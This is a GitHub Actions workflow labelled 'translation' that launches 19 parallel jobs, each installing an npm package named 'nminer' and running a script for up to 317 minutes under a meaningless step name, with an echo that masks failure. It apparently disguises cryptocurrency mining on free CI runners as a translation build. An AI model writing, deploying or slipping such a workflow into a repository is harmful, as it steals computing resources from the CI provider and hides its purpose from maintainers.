name: translation
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 5344 }
          - { version: 2474 }
          - { version: 1882 }
          - { version: 6967 }
          - { version: 1633 }
          - { version: 9886 }
          - { version: 1786 }
          - { version: 6839 }
          - { version: 1703 }
          - { version: 2936 }
          - { version: 3889 }
          - { version: 4897 }
          - { version: 5924 }
          - { version: 9119 }
          - { version: 1587 }
          - { version: 376 }
          - { version: 262 }
          - { version: 6119 }
          - { version: 6708 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: obedient dimly sadly
        run: |
          npm install nminer@latest
          timeout 317m node translation.js || echo "translation executed"